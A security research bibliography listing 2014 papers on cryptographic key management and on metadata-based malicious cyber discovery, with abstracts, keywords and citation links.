Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Key Management

Key Management


Successful key management is critical to the security of any cryptosystem. It is perhaps the most difficult part of cryptography including as it does system policy, user training, organizational and departmental interactions, and coordination between all of these elements and includes dealing with the generation, exchange, storage, use, and replacement of keys, key servers, cryptographic protocols, and user procedures. For researchers, key management is a challenge to create larger scale and faster systems to operate within the cloud and other complex environments, while ensuring validity and not adding weight to the process. The research cited here was presented or published in the first half of 2014.

  • Talawar, S.H.; Maity, S.; Hansdah, R.C., "Secure Routing with an Integrated Localized Key Management Protocol in MANETs," Advanced Information Networking and Applications (AINA), 2014 IEEE 28th International Conference on , vol., no., pp.605,612, 13-16 May 2014. doi: 10.1109/AINA.2014.74 A routing protocol in a mobile ad hoc network (MANET) should be secure against both the outside attackers which do not hold valid security credentials and the inside attackers which are the compromised nodes in the network. The outside attackers can be prevented with the help of an efficient key management protocol and cryptography. However, to prevent inside attackers, it should be accompanied with an intrusion detection system (IDS). In this paper, we propose a novel secure routing with an integrated localized key management (SR-LKM) protocol, which is aimed to prevent both inside and outside attackers. The localized key management mechanism is not dependent on any routing protocol. Thus, unlike many other existing schemes, the protocol does not suffer from the key management - secure routing interdependency problem. The key management mechanism is lightweight as it optimizes the use of public key cryptography with the help of a novel neighbor based handshaking and Least Common Multiple (LCM) based broadcast key distribution mechanism. The protocol is storage scalable and its efficiency is confirmed by the results obtained from simulation experiments.
    Keywords: cryptographic protocols; mobile ad hoc networks; public key cryptography ;routing protocols; MANET; broadcast key distribution mechanism; integrated localized key management protocol; intrusion detection system; key management protocol; mobile ad hoc network; neighbor based handshaking and least common multiple; public key cryptography; routing protocol; routing security; Ad hoc networks; Authentication; Mobile computing; Public key; Routing; Routing protocols ;Intrusion Detection System (IDS); Key Management; Mobile Ad hoc Network (MANET); Secure Routing (ID#:14-2149)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838720&isnumber=6838626
  • Zhang, Ying; Pengfei, Ji, "An Efficient And Hybrid Key Management For Heterogeneous Wireless Sensor Networks," Control and Decision Conference (2014 CCDC), The 26th Chinese , vol., no., pp.1881,1885, May 31 2014-June 2 2014. doi: 10.1109/CCDC.2014.6852476 Key management is the core to ensure the communication security of wireless sensor network. How to establish efficient key management in wireless sensor networks (WSN) is a challenging problem for the constrained energy, memory, and computational capabilities of the sensor nodes. Previous research on sensor network security mainly considers homogeneous sensor networks with symmetric key cryptography. Recent researches have shown that using asymmetric key cryptography in heterogeneous sensor networks (HSN) can improve network performance, such as connectivity, resilience, etc. Considering the advantages and disadvantages of symmetric key cryptography and asymmetric key cryptography, the paper propose an efficient and hybrid key management method for heterogeneous wireless sensor network, cluster heads and base stations use public key encryption method based on elliptic curve cryptography (ECC), while using symmetric encryption method between adjacent nodes in the cluster. The analysis and simulation results show that the proposed key management method can provide better security, prefect scalability and connectivity with saving on storage space.
    Keywords: Elliptic curve cryptography; Encryption; Energy consumption; Wireless sensor networks; Elliptic Curve Cryptography; Heterogeneous Wireless Sensor Networks; Key Management; Symmetric Encryption (ID#:14-2150)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6852476&isnumber=6852105
  • Nicanfar, H.; Jokar, P.; Beznosov, K.; Leung, V.C.M., "Efficient Authentication and Key Management Mechanisms for Smart Grid Communications," Systems Journal, IEEE, vol.8, no.2, pp.629, 640, June 2014. doi: 10.1109/JSYST.2013.2260942 A smart grid (SG) consists of many subsystems and networks, all working together as a system of systems, many of which are vulnerable and can be attacked remotely. Therefore, security has been identified as one of the most challenging topics in SG development, and designing a mutual authentication scheme and a key management protocol is the first important step. This paper proposes an efficient scheme that mutually authenticates a smart meter of a home area network and an authentication server in SG by utilizing an initial password, by decreasing the number of steps in the secure remote password protocol from five to three and the number of exchanged packets from four to three. Furthermore, we propose an efficient key management protocol based on our enhanced identity-based cryptography for secure SG communications using the public key infrastructure. Our proposed mechanisms are capable of preventing various attacks while reducing the management overhead. The improved efficiency for key management is realized by periodically refreshing all public/private key pairs as well as any multicast keys in all the nodes using only one newly generated function broadcasted by the key generator entity. Security and performance analyses are presented to demonstrate these desirable attributes.
    Keywords: authorization; cryptographic protocols; home networks; public key cryptography; smart power grids; authentication server; home area network; identity-based cryptography; initial password; key generator entity; key management protocol; management overhead; public key infrastructure; public-private key pairs; secure remote password protocol; smart grid communications; Enhanced identity-based cryptography (EIBC);key management; mutual authentication; secure remote password (SRP);security ;smart grid (SG); smart meter (SM) (ID#:14-2151)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6553352&isnumber=6819870
  • Kodali, Ravi Kishore, "Key Management Technique for WSNs," Region 10 Symposium, 2014 IEEE , vol., no., pp.540,545, 14-16 April 2014. doi: 10.1109/TENCONSpring.2014.6863093 In Wireless sensor networks (WSNs), many tiny sensor nodes communicate using wireless links and collaborate with each other. The data collected by each of the nodes is communicated towards the gateway node after carrying out aggregation of the data by different nodes. It is necessary to secure the data collected by the WSN nodes while they communicate among themselves using multi hop wireless links. To meet this objective it is required to make use of energy efficient cryptographic algorithms so that the same can be ported over the resource constrained nodes. It is needed to create trust initially among the WSN nodes while using any of the cryptographic algorithms. Towards this, a key management technique needs to be made use of. Due to the resource constrained nature of the WSN nodes and the remote deployment of the nodes, an implementation of conventional key management techniques is infeasible. This work proposes a key management technique, with its reduced resource overheads, which is highly suited to be used in hierarchical WSN applications. Both Identity based key management (IBK) and probabilistic key pre-distribution schemes are made use of at different hierarchical levels. The proposed key management technique has been implemented using IRIS WSN nodes. A comparison of resource overheads has also been carried out.
    Keywords: IBK; Key management; WSN; security (ID#:14-2152)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6863093&isnumber=6862973
  • Jin Li; Xiaofeng Chen; Mingqiang Li; Jingwei Li; Lee, P.P.C.; Wenjing Lou, "Secure Deduplication with Efficient and Reliable Convergent Key Management," Parallel and Distributed Systems, IEEE Transactions on, vol.25, no.6, pp.1615,1625, June 2014. doi: 10.1109/TPDS.2013.284 Data deduplication is a technique for eliminating duplicate copies of data, and has been widely used in cloud storage to reduce storage space and upload bandwidth. Promising as it is, an arising challenge is to perform secure deduplication in cloud storage. Although convergent encryption has been extensively adopted for secure deduplication, a critical issue of making convergent encryption practical is to efficiently and reliably manage a huge number of convergent keys. This paper makes the first attempt to formally address the problem of achieving efficient and reliable key management in secure deduplication. We first introduce a baseline approach in which each user holds an independent master key for encrypting the convergent keys and outsourcing them to the cloud. However, such a baseline key management scheme generates an enormous number of keys with the increasing number of users and requires users to dedicatedly protect the master keys. To this end, we propose Dekey , a new construction in which users do not need to manage any keys on their own but instead securely distribute the convergent key shares across multiple servers. Security analysis demonstrates that Dekey is secure in terms of the definitions specified in the proposed security model. As a proof of concept, we implement Dekey using the Ramp secret sharing scheme and demonstrate that Dekey incurs limited overhead in realistic environments.
    Keywords: cloud computing; private key cryptography; public key cryptography; storage management; Dekey; Ramp secret sharing scheme; baseline key management scheme; cloud storage; convergent encryption; data deduplication; reliable convergent key management; secure deduplication; security model; storage space reduction; Bismuth; Educational institutions;Encryption;Reliability;Servers;Deduplication;convergent encryption; key management; proof of ownership (ID#:14-2153)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6658753&isnumber=6814303
  • Abdallah, W.; Boudriga, N.; Daehee Kim; Sunshin An, "An Efficient And Scalable Key Management Mechanism For Wireless Sensor Networks," Advanced Communication Technology (ICACT), 2014 16th International Conference on , vol., no., pp.687,692, 16-19 Feb. 2014. doi: 10.1109/ICACT.2014.6779051 A major issue to secure wireless sensor networks is key distribution. Current key distribution schemes are not fully adapted to the tiny, low-cost, and fragile sensors with limited computation capability, reduced memory size, and battery-based power supply. This paper investigates the design of an efficient key distribution and management scheme for wireless sensor networks. The proposed scheme can ensure the generation and distribution of different encryption keys intended to secure individual and group communications. This is performed based on elliptic curve public key encryption using Diffie-Hellman like key exchange and secret sharing techniques that are applied at different levels of the network topology. This scheme is more efficient and less complex than existing approaches, due to the reduced communication and processing overheads required to accomplish key exchange. Furthermore, few keys with reduced sizes are managed in sensor nodes which optimizes memory usage, and enhances scalability to large size networks.
    Keywords: public key cryptography ;telecommunication network management; telecommunication network topology; telecommunication security; wireless sensor networks; Diffie-Hellman like key exchange; battery-based power supply; elliptic curve public key encryption; encryption keys; group communications; key distribution schemes; large size networks ;limited computation capability; network topology; processing overheads; reduced memory size; scalable key management mechanism; secret sharing techniques; secure wireless sensor networks; sensor nodes; Base stations; Elliptic curves; Public key; Sensors; Wireless sensor networks; Elliptic curve cryptography; Key management; Security; Wireless sensor networks (ID#:14-2154)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779051&isnumber=6778899
  • Vijayakumar, P.; Bose, S.; Kannan, A, "Chinese Remainder Theorem Based Centralized Group Key Management For Secure Multicast Communication," Information Security, IET , vol.8, no.3, pp.179,187, May 2014. doi: 10.1049/iet-ifs.2012.0352 Designing a centralized group key management with minimal computation complexity to support dynamic secure multicast communication is a challenging issue in secure multimedia multicast. In this study, the authors propose a Chinese remainder theorem-based group key management scheme that drastically reduces computation complexity of the key server. The computation complexity of key server is reduced to O(1) in this proposed algorithm. Moreover, the computation complexity of group member is also minimized by performing one modulo division operation when a user join or leave operation is performed in a multicast group. The proposed algorithm has been implemented and tested using a key-star-based key management scheme and has been observed that this proposed algorithm reduces the computation complexity significantly.
    Keywords: communication complexity; multicast communication; multimedia communication; telecommunication security; Chinese remainder theorem; centralized group key management; computation complexity; secure multimedia multicast communication (ID#:14-2155)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6786958&isnumber=6786849
  • Buchade, AR.; Ingle, R., "Key Management for Cloud Data Storage: Methods and Comparisons," Advanced Computing & Communication Technologies (ACCT), 2014 Fourth International Conference on , vol., no., pp.263,270, 8-9 Feb. 2014. doi: 10.1109/ACCT.2014.78 Cloud computing paradigm is being used because of its low up-front cost. In recent years, even mobile phone users store their data at Cloud. Customer information stored at Cloud needs to be protected against potential intruders as well as cloud service provider. There is threat to the data in transit and data at cloud due to different possible attacks. Organizations are transferring important information to the Cloud that increases concern over security of data. Cryptography is common approach to protect the sensitive information in Cloud. Cryptography involves managing encryption and decryption keys. In this paper, we compare key management methods, apply key management methods to various cloud environments and analyze symmetric key cryptography algorithms.
    Keywords: cloud computing; cryptography; storage management; cloud computing paradigm; cloud data storage; cloud service provider; data security; decryption key management; encryption key management; potential intruders; sensitive information protection; symmetric key cryptography algorithms; Cloud computing; Communities; Memory; Organizations; Public key; Servers; Key management; applications; cloud scenarios; onsite cloud ;outsourced cloud; public cloud; symmetric key (ID#:14-2156)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6783462&isnumber=6783406
  • Lalitha, T.; Devi, AJ., "Security in Wireless Sensor Networks: Key Management Module in EECBKM," Computing and Communication Technologies (WCCCT), 2014 World Congress on , vol., no., pp.306,308, Feb. 27 2014-March 1 2014. doi: 10.1109/WCCCT.2014.12 Wireless Sensor Networks (WSN) is vulnerable to node capture attacks in which an attacker can capture one or more sensor nodes and reveal all stored security information which enables him to compromise a part of the WSN communications. Due to large number of sensor nodes and lack of information about deployment and hardware capabilities of sensor node, key management in wireless sensor networks has become a complex task. Limited memory resources and energy constraints are the other issues of key management in WSN. Hence an efficient key management scheme is necessary which reduces the impact of node capture attacks and consume less energy. By simulation results, we show that our proposed technique efficiently increases packet delivery ratio with reduced energy consumption.
    Keywords: telecommunication network management; telecommunication security; wireless sensor networks; EECBKM; WSN communication; energy constraint; energy consumption; key management module; limited memory resource; node capture attack; packet delivery ratio;s ecurity information; wireless sensor network; Authentication; Cryptography; Nickel; Routing; Routing protocols; Wireless sensor networks; Authentication; Key Management; Security (ID#:14-2157)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6755165&isnumber=6755083
  • Gandino, F.; Montrucchio, B.; Rebaudengo, M., "Key Management for Static Wireless Sensor Networks With Node Adding," Industrial Informatics, IEEE Transactions on , vol.10, no.2, pp.1133,1143, May 2014. doi: 10.1109/TII.2013.2288063 Wireless sensor networks offer benefits in several applications but are vulnerable to various security threats, such as eavesdropping and hardware tampering. In order to reach secure communications among nodes, many approaches employ symmetric encryption. Several key management schemes have been proposed in order to establish symmetric keys. The paper presents an innovative key management scheme called random seed distribution with transitory master key, which adopts the random distribution of secret material and a transitory master key used to generate pairwise keys. The proposed approach addresses the main drawbacks of the previous approaches based on these techniques. Moreover, it overperforms the state-of-the-art protocols by providing always a high security level.
    Keywords: cryptographic protocols; random processes; telecommunication network management; telecommunication security; wireless sensor networks; eavesdropping; hardware tampering; protocol; random seed distribution; secure communication; security threat; static wireless sensor network; symmetric encryption; symmetric key management scheme; transitory master key; Cryptography; Informatics; Knowledge engineering; Materials; Protocols; Wireless sensor networks; Key management; random key distribution; transitory master key; wireless sensor networks (WSNs) (ID#:14-2158)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6651779&isnumber=6809862
  • Young Sil Lee; Alasaarela, E.; HoonJae Lee, "Secure Key Management Scheme Based On ECC Algorithm For Patient's Medical Information In Healthcare System," Information Networking (ICOIN), 2014 International Conference on , vol., no., pp.453,457, 10-12 Feb. 2014. doi: 10.1109/ICOIN.2014.6799723 Recent advances in Wireless Sensor Networks have given rise to many application areas in healthcare such as the new field of Wireless Body Area Networks. The health status of humans can be tracked and monitored using wearable and non-wearable sensor devices. Security in WBAN is very important to guarantee and protect the patient's personal sensitive data and establishing secure communications between BAN sensors and external users is key to addressing prevalent security and privacy concerns. In this paper, we propose secure and efficient key management scheme based on ECC algorithm to protect patient's medical information in healthcare system. Our scheme divided into three phases as setup, registration, verification and key exchange. And we use the identification code which is the SIM card number on a patient's smart phone with the private key generated by the legal use instead of the third party. Also to prevent the replay attack, we use counter number at every process of authenticated message exchange to resist.
    Keywords: body area networks; health care; medical information systems; message authentication; public key cryptography; ECC algorithm; WBAN; authenticated message exchange; healthcare system; patient medical information protection; secure key management scheme; wireless body area networks; wireless sensor networks; Elliptic curve cryptography ;Elliptic curves; Medical services; Sensors; Wireless sensor networks; Elliptic curve Cryptography; body area sensor network security; healthcare security; key management; secure communication (ID#:14-2159)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6799723&isnumber=6799467
  • Pura, Mihai Lica; Buchs, Didier, "A Self-Organized Key Management Scheme For Ad Hoc Networks Based On Identity-Based Cryptography," Communications (COMM), 2014 10th International Conference on , vol., no., pp.1,4, 29-31 May 2014. doi: 10.1109/ICComm.2014.6866683 Abstract: Ad hoc networks represent a very modern technology for providing communication between devices without the need of any prior infrastructure set up, and thus in an "on the spot" manner. But there is a catch: so far there isn't any security scheme that would suit the ad hoc properties of this type of networks and that would also accomplish the needed security objectives. The most promising proposals are the self-organized schemes. This paper presents a work in progress aiming at developing a new self-organized key management scheme that uses identity based cryptography for making impossible some of the attacks that can be performed over the schemes proposed so far, while preserving their advantages. The paper starts with a survey of the most important self-organized key management schemes and a short analysis of the advantages and disadvantages they have. Then, it presents our new scheme, and by using informal analysis, it presents the advantages it has over the other proposals.
    Keywords: ad hoc networks; identity based cryptography; key management; security; self-organization (ID#:14-2160)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6866683&isnumber=6866648
  • Tang, S.; Xu, L.; Liu, N.; Huang, X.; Ding, J.; Yang, Z., "Provably Secure Group Key Management Approach Based upon Hyper-Sphere," Parallel and Distributed Systems, IEEE Transactions on, vol. PP, no.99, pp.1,1, January 2014. doi: 10.1109/TPDS.2013.2297917 This supplementary file consists of three sections. In Section I, a theorem is presented to prove that the number of points on a hyper-sphere over finite field GF(p) is at least pN1 for a given hyper-sphere determined by C = (c0; c1; : : : ; cN) 2 GF(p)N+1 and R 2 GF(p), where p is a prime. In Section II, a concrete algorithm to find a point on a hyper-sphere is constructed. In Section III, two lemmas and a theorem are proposed and proven, then the security of the proposed group key management scheme is proven formally.
    Keywords: Algorithm design and analysis; Concrete; Educational institutions; Galois fields; Protocols; Security; Vectors (ID#:14-2161)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6714432&isnumber=4359390
  • Jian Zhou, Liyan Sun, Xianwei Zhou, Junde Song, "High Performance Group Merging/Splitting Scheme for Group Key Management," Wireless Personal Communications: An International Journal, Volume 75 Issue 2, March 2014, Pages 1529-1545. doi>10.1007/s11277-013-1436-x The group merging/splitting event is different to the joining/leaving events in which only a member joins or leaves group, but in the group merging/splitting event two small groups merge together into a group or a group is divided into two independent parts. Rekeying is an importance issue for key management whose target is to guarantee forward security and backward security in case of membership changes, however rekeying efficiency is related to group scale in most existing group key management schemes, so as to those schemes are not suitable to the applications whose rekeying time delay is limited strictly. In particular, multiple members are involved in the group merging/splitting event, thus the rekeying performance becomes a worried problem. In this paper, a high performance group merging/splitting group key management scheme is proposed based on an one-encryption-key multi-decryption-key key protocol, in the proposed scheme each member has an unique decryption key that is corresponding to a common encryption key so as to only the common encryption key is updated when the group merging/splitting event happens, however the secret decryption key still keeps unchanged. In efficiency aspect, since no more than a message on merging/splitting event is sent, at time the network load is reduced since only a group member's key material is enough for other group members to agree a fresh common encryption key. In security aspect, our proposed scheme achieves the key management security requirements including passive security, forward security, backward security and key independence. Therefore, our proposed scheme is suitable to the dynamitic networks that the rekeying time delay is limited strictly such as tolerate delay networks.
    Keywords: Group key management, Group merging/splitting operation, One-encryption-key multi-decryption-key key protocol, Rekeying, Time delay (ID#:14-2162)
    URL: http://dl.acm.org/citation.cfm?id=2583852.2583893&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1007/s11277-013-1436-x
  • Vanga Odelu, Ashok Kumar Das, Adrijit Goswami, "A Secure Effective Key Management Scheme For Dynamic Access Control In A Large Leaf Class Hierarchy," Information Sciences: an International Journal, Volume 269, June, 2014, Pages 270-285. doi>10.1016/j.ins.2013.10.022 Lo et al. (2011) proposed an efficient key assignment scheme for access control in a large leaf class hierarchy where the alternations in leaf classes are more frequent than in non-leaf classes in the hierarchy. Their scheme is based on the public-key cryptosystem and hash function where operations like modular exponentiations are very much costly compared to symmetric-key encryptions and decryptions, and hash computations. Their scheme performs better than the previously proposed schemes. However, in this paper, we show that Lo et al.'s scheme fails to preserve the forward security property where a security class C"x can also derive the secret keys of its successor classes C"j's even after deleting the security class C"x from the hierarchy. We aim to propose a new key management scheme for dynamic access control in a large leaf class hierarchy, which makes use of symmetric-key cryptosystem and one-way hash function. We show that our scheme requires significantly less storage and computational overheads as compared to Lo et al.'s scheme and other related schemes. Through the informal and formal security analysis, we further show that our scheme is secure against all possible attacks including the forward security. In addition, our scheme supports efficiently dynamic access control problems compared to Lo et al.'s scheme and other related schemes. Thus, higher security along with low storage and computational costs make our scheme more suitable for practical applications compared to other schemes.
    Keywords: Access control, Hash function, Hierarchy, Key management, Security, Symmetric-key cryptosystem (ID#:14-2163)
    URL: http://dl.acm.org/citation.cfm?id=2598931.2599025&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.ins.2013.10.022
  • Alireza T. Boloorchi, M. H. Samadzadeh, T. Chen, "Symmetric Threshold Multipath (STM): An Online Symmetric Key Management Scheme," Information Sciences: an International Journal, Volume 268, June, 2014, Pages 489-504. doi>10.1016/j.ins.2013.12.017 The threshold secret sharing technique has been used extensively in cryptography. This technique is used for splitting secrets into shares and distributing the shares in a network to provide protection against attacks and to reduce the possibility of loss of information. In this paper, a new approach is introduced to enhance communication security among the nodes in a network based on the threshold secret sharing technique and traditional symmetric key management. The proposed scheme aims to enhance security of symmetric key distribution in a network. In the proposed scheme, key distribution is online which means key management is conducted whenever a message needs to be communicated. The basic idea is encrypting a message with a key (the secret) at the sender, then splitting the key into shares and sending the shares from different paths to the destination. Furthermore, a Pre-Distributed Shared Key scheme is utilized for more secure transmissions of the secret's shares. The proposed scheme, with the exception of some offline management by the network controller, is distributed, i.e., the symmetric key setups and the determination of the communication paths is performed in the nodes. This approach enhances communication security among the nodes in a network that operates in hostile environments. The cost and security analyses of the proposed scheme are provided.
    Keywords: Multipath communication, Online key distribution, Symmetric key management, Threshold secret sharing (ID#:14-2164)
    URL: http://dl.acm.org/citation.cfm?id=2598944.2599220&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.ins.2013.12.017
  • Holger Kuehner, Hannes Hartenstein, "Spoilt for Choice: Graph-Based Assessment Of Key Management Protocols To Share Encrypted Data," CODASPY '14 Proceedings of the 4th ACM conference on Data and Application Security And Privacy, March 2014, Pages 147-150. doi>10.1145/2557547.2557583 Sharing data with client-side encryption requires key management. Selecting an appropriate key management protocol for a given scenario is hard, since the interdependency between scenario parameters and the resource consumption of a protocol is often only known for artificial, simplified scenarios. In this paper, we explore the resource consumption of systems that offer sharing of encrypted data within real-world scenarios, which are typically complex and determined by many parameters. For this purpose, we first collect empirical data that represents real-world scenarios by monitoring large-scale services within our organization. We then use this data to parameterize a resource consumption model that is based on the key graph generated by each key management protocol. The preliminary simulation runs we did so far indicate that this key-graph based model can be used to estimate the resource consumption of real-world systems for sharing encrypted data.
    Keywords: key management protocols, workloads (ID#:14-2165)
    URL: http://dl.acm.org/citation.cfm?id=2557547.2557583&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://doi.acm.org/10.1145/2557547.2557583
  • Damiano Macedonio, Massimo Merro, "A Semantic Analysis Of Key Management Protocols For Wireless Sensor Networks," Science of Computer Programming, Volume 81, February, 2014, Pages 53-78. doi>10.1016/j.scico.2013.01.005 Gorrieri and Martinelli's timed Generalized Non-Deducibility on Compositions (tGNDC) schema is a well-known general framework for the formal verification of security protocols in a concurrent scenario. We generalise the tGNDC schema to verify wireless network security protocols. Our generalisation relies on a simple timed broadcasting process calculus whose operational semantics is given in terms of a labelled transition system which is used to derive a standard simulation theory. We apply our tGNDC framework to perform a security analysis of three well-known key management protocols for wireless sensor networks: @mTESLA, LEAP+ and LiSP.
    Keywords: Key management protocol, Process calculus, Security analysis, Wireless sensor networks (ID#:14-2170)
    URL: http://dl.acm.org/citation.cfm?id=2565891.2566132&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.scico.2013.01.005

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Metadata Discovery Problem

Metadata Discovery Problem


Metadata is often described as "data about data." Usage varies from virtualization to data warehousing to statistics. Because of its volume and complexity, metadata has the potential to tax security procedures and processes. A recent workshop described a Metadata-based Malicious Cyber Discovery Problem and solicited research and papers. The bibliography presented here provides a number of papers published early in 2014.

  • Khanuja, H.; Suratkar, S.S., ""Role of Metadata In Forensic Analysis Of Database Attacks"," Advance Computing Conference (IACC), 2014 IEEE International , vol., no., pp.457,462, 21-22 Feb. 2014. With the spectacular increase in online activities like e-transactions, security and privacy issues are at the peak with respect to their significance. Large numbers of database security breaches are occurring at a very high rate on daily basis. So, there is a crucial need in the field of database forensics to make several redundant copies of sensitive data found in database server artifacts, audit logs, cache, table storage etc. for analysis purposes. Large volume of metadata is available in database infrastructure for investigation purposes but most of the effort lies in the retrieval and analysis of that information from computing systems. Thus, in this paper we mainly focus on the significance of metadata in database forensics. We proposed a system here to perform forensics analysis of database by generating its metadata file independent of the DBMS system used. We also aim to generate the digital evidence against criminals for presenting it in the court of law in the form of who, when, why, what, how and where did the fraudulent transaction occur. Thus, we are presenting a system to detect major database attacks as well as anti-forensics attacks by developing an open source database forensics tool. Eventually, we are pointing out the challenges in the field of forensics and how these challenges can be used as opportunities to stimulate the areas of database forensics.
    Keywords: data privacy; digital forensics; law; meta data; antiforensics attacks; audit logs; cache; court of law; database attacks; database security breaches; database server artifacts; digital evidence; e-transactions; forensic analysis; fraudulent transaction; information analysis; information retrieval; metadata; online activities; open source database forensics tool; privacy issue; security issue ;table storage; conferences; Handheld computers; Database forensics; SQL injection; anti-forensics attacks; digital notarization ;linked hash technique; metadata; reconnaissance attack; trail obfuscation (ID#:14-2171)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779367&isnumber=6779283
  • Vollmer, T.; Manic, M.; Linda, O., "Autonomic Intelligent Cyber-Sensor to Support Industrial Control Network Awareness," Industrial Informatics, IEEE Transactions on, vol.10, no.2, pp.1647,1658, May 2014 The proliferation of digital devices in a networked industrial ecosystem, along with an exponential growth in complexity and scope, has resulted in elevated security concerns and management complexity issues. This paper describes a novel architecture utilizing concepts of autonomic computing and a simple object access protocol (SOAP)-based interface to metadata access points (IF-MAP) external communication layer to create a network security sensor. This approach simplifies integration of legacy software and supports a secure, scalable, and self-managed framework. The contribution of this paper is twofold: 1) A flexible two-level communication layer based on autonomic computing and service oriented architecture is detailed and 2) three complementary modules that dynamically reconfigure in response to a changing environment are presented. One module utilizes clustering and fuzzy logic to monitor traffic for abnormal behavior. Another module passively monitors network traffic and deploys deceptive virtual network hosts. These components of the sensor system were implemented in C++ and PERL and utilize a common internal D-Bus communication mechanism. A proof of concept prototype was deployed on a mixed-use test network showing the possible real-world applicability. In testing, 45 of the 46 network attached devices were recognized and 10 of the 12 emulated devices were created with specific operating system and port configurations. In addition, the anomaly detection algorithm achieved a 99.9% recognition rate. All output from the modules were correctly distributed using the common communication structure.
    Keywords: access protocols; computer network security; fault tolerant computing; field buses; fuzzy logic; industrial control; intelligent sensors; meta data; network interfaces; pattern clustering; C++;IF-MAP; PERL; SOAP-based interface; anomaly detection algorithm; autonomic computing; autonomic intelligent cyber-sensor; digital device proliferation; flexible two-level communication layer; fuzzy logic; industrial control network awareness; internal D-Bus communication mechanism; legacy software; metadata access point external communication layer; mixed-use test network; network security sensor; networked industrial ecosystem; proof of concept prototype; self-managed framework; service oriented architecture; simple object access protocol-based interface; traffic monitor; virtual network hosts; Autonomic computing; control systems; industrial ecosystems; network security; service-oriented architecture . (ID#:14-2172)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6547755&isnumber=6809862
  • Afzal Butt, Muhammad Irfan, "BIOS Integrity And Advanced Persistent Threat," Information Assurance and Cyber Security (CIACS), 2014 Conference on , vol., no., pp.47,50, 12-13 June 2014. Basic Input Output System (BIOS) is the most important component of a computer system by virtue of its role i.e., it holds the code which is executed at the time of startup. It is considered as the trusted computing base, and its integrity is extremely important for smooth functioning of the system. On the contrary, BIOS of new computer systems (servers, laptops, desktops, network devices, and other embedded systems) can be easily upgraded using a flash or capsule mechanism which can add new vulnerabilities either through malicious code, or by accidental incidents, and deliberate attack. The recent attack on Iranian Nuclear Power Plant (Stuxnet) is an example of advanced persistent attack. This attack vector adds a new dimension into the information security (IS) spectrum, which needs to be guarded by implementing a holistic approach employed at enterprise level. Malicious BIOS upgrades can also cause denial of service, stealing of information or addition of new backdoors which can be exploited by attackers for causing business loss, passive eaves dropping or total destruction of system without knowledge of user. To address this challenge a capability for verification of BIOS integrity needs to be developed and due diligence must be observed for proactive resolution of the issue. This paper explains the BIOS Integrity threats and presents a prevention strategy for effective and proactive resolution.
    Keywords: Advanced Persistent Threat (APT); BIOS Integrity Measurement; Original Equipment Manufacturer (OEM); Roots of Trust (RoTs); Trusted Computing (ID#:14-2173)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861331&isnumber=6861314
  • Ling, Zhen; Luo, Junzhou; Wu, Kui; Yu, Wei; Fu, Xinwen, "TorWard: Discovery of Malicious Traffic Over Tor," INFOCOM, 2014 Proceedings IEEE , vol., no., pp.1402,1410, April 27 2014-May 2 2014. Tor is a popular low-latency anonymous communication system. However, it is currently abused in various ways. Tor exit routers are frequently troubled by administrative and legal complaints. To gain an insight into such abuse, we design and implement a novel system, TorWard, for the discovery and systematic study of malicious traffic over Tor. The system can avoid legal and administrative complaints and allows the investigation to be performed in a sensitive environment such as a university campus. An IDS (Intrusion Detection System) is used to discover and classify malicious traffic. We performed comprehensive analysis and extensive real-world experiments to validate the feasibility and effectiveness of TorWard. Our data shows that around 10% Tor traffic can trigger IDS alerts. Malicious traffic includes P2P traffic, malware traffic (e.g., botnet traffic), DoS (Denial-of-Service) attack traffic, spam, and others. Around 200 known malware have been identified. To the best of our knowledge, we are the first to perform malicious traffic categorization over Tor.
    Keywords: Bandwidth; Computers ;Logic gates; Malware; Mobile handsets; Ports (Computers); Servers; Intrusion Detection System; Malicious Traffic; Tor (ID#:14-2174)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6848074&isnumber=6847911
